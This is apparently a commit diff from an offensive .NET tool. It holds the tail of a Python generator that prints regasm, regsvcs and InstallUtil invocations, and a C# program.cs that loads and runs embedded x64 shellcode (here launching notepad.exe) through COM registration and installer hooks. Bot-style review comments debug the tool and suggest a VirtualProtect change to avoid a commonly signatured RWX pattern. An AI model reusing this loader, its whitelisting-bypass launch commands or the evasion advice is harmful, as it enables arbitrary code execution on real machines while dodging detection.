%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:rogue.dll /keyfile:key.snk program.cs
Step 3: Execute your payload!
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll
%WINDIR%\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
%WINDIR%\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
'''.format(management)
if 'PROGRAMFILES(X86)' in os.environ:
commands = commands.replace('Framework', 'Framework64')
sys.stderr.write(commands)
if __name__ == '__main__':
main(sys.argv)
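Review bot: detectFileIsExe() can never return True under Python 3, so the --exe mode is dead: the file is opened in 'rb' mode, which makes `first1000[0]` an int, and `first1000[0] == 'M'` (likewise 'Z', 'P', 'E') is always False; compare against bytes instead (`first1000[:2] == b'MZ'`, `first1000[elfanew:elfanew + 2] == b'PE'`), and read e_lfanew as a 4-byte field (`struct.unpack('<I', ...)`) rather than '<H'. The following `printables` comprehension would also raise TypeError (`x in string.printable` with an int) if the function ever got that far. Even with the detection fixed, the exe path then calls `base64.b64encode(payload.encode())` on a bytes object read from the file, which raises AttributeError; only the PowerShell branch has a str payload. In the generated C# for that branch, `method.Invoke(instance, null)` throws TargetParameterCountException for the common `Main(string[] args)` entry point, so the args array should be passed when `method.GetParameters().Length == 1`, and `asm.CreateInstance(method.Name)` passes a method name where a type name is expected (it returns null, which only works because Main is static). Separately, the InstallUtil lines in the `commands` banner at the end of main() already use Framework64 under what is otherwise the x86 listing, and the subsequent `commands.replace('Framework', 'Framework64')` turns them into Framework6464 on 64-bit hosts; list them with Framework\ like the neighbouring regasm/regsvcs lines and let the replace apply uniformly. Also, the `if args.inputFile.endswith('.exe'): return False` guard in the PowerShell branch exits silently; print why.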

Binary file not shown.


@ -0,0 +1,141 @@
using System;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.EnterpriseServices;
/*
Author: Casey Smith, Twitter: @subTee
Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com>
License: BSD 3-Clause
Step 1: Create Your Strong Name Key -> key.snk
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte
Step 2: Compile source code:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
Step 3: Execute your payload!
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
*/
namespace Program
{
public class Bypass : ServicedComponent
{
public Bypass()
{
}
// This executes if registration is successful
[ComRegisterFunction]
public static void RegisterClass( string key )
{
Shellcode.Execute();
}
// This executes if registration fails
[ComUnregisterFunction]
public static void UnRegisterClass( string key )
{
Shellcode.Execute();
}
}
[System.ComponentModel.RunInstaller(true)]
public class ForInstallUtil : System.Configuration.Install.Installer
{
// This executes during InstallUtil /U invocation
public override void Uninstall(System.Collections.IDictionary savedState)
{
Shellcode.Execute();
}
}
public class Shellcode
{
[DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(
IntPtr lpAddress, UIntPtr dwSize,
UInt32 flAllocationType,
UInt32 flProtect
);
[DllImport("kernel32")]
private static extern bool VirtualFree(
IntPtr lpAddress,
UInt32 dwSize,
UInt32 dwFreeType
);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
IntPtr lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern bool CloseHandle(
IntPtr hHandle
);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
private static UInt32 MEM_RELEASE = 0x8000;
public static void Execute() {
byte[] payload = new byte[279] {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed,
0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88,
0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44,
0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48,
0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1,
0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44,
0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49,
0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a,
0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41,
0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b,
0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47,
0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x6e, 0x6f, 0x74, 0x65, 0x70,
0x61, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x00
};
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(payload, 0, funcAddr, payload.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
CloseHandle(hThread);
VirtualFree(funcAddr, 0, MEM_RELEASE);
}
}
}
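Review bot: the comment on UnRegisterClass ("This executes if registration fails") is wrong: a [ComUnregisterFunction] runs when the assembly is unregistered (the /U invocations in the README), not when registration fails; the same comment is carried into the template inside generateRogueDotNet.py and should be corrected in both places. The header comment block in this file also still references regsvcs.dll and omits the InstallUtil invocations that the class added below it exists for, so it is stale relative to the README in the same commit. The embedded sample payload is x64 shellcode (the `fc 48 83 e4 f0 e8 ...` prologue and `notepad.exe` string at the end match the notepad64.bin sample in the README), so this checked-in program.cs only works from the Framework64\ hosts; say so in the header, because the Framework\ commands listed there will crash with it. Two P/Invoke points: CreateThread's lpThreadAttributes is a pointer and dwStackSize a SIZE_T, and VirtualFree's dwSize is a SIZE_T, so declaring them as UInt32 only works because 0 is passed; use IntPtr/UIntPtr. Finally, a VirtualAlloc with PAGE_EXECUTE_READWRITE followed by CreateThread on that region from a .NET host is one of the most commonly signatured loader patterns; allocating RW, copying, then VirtualProtect to PAGE_EXECUTE_READ before CreateThread costs one extra import and removes the RWX region.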

Binary file not shown.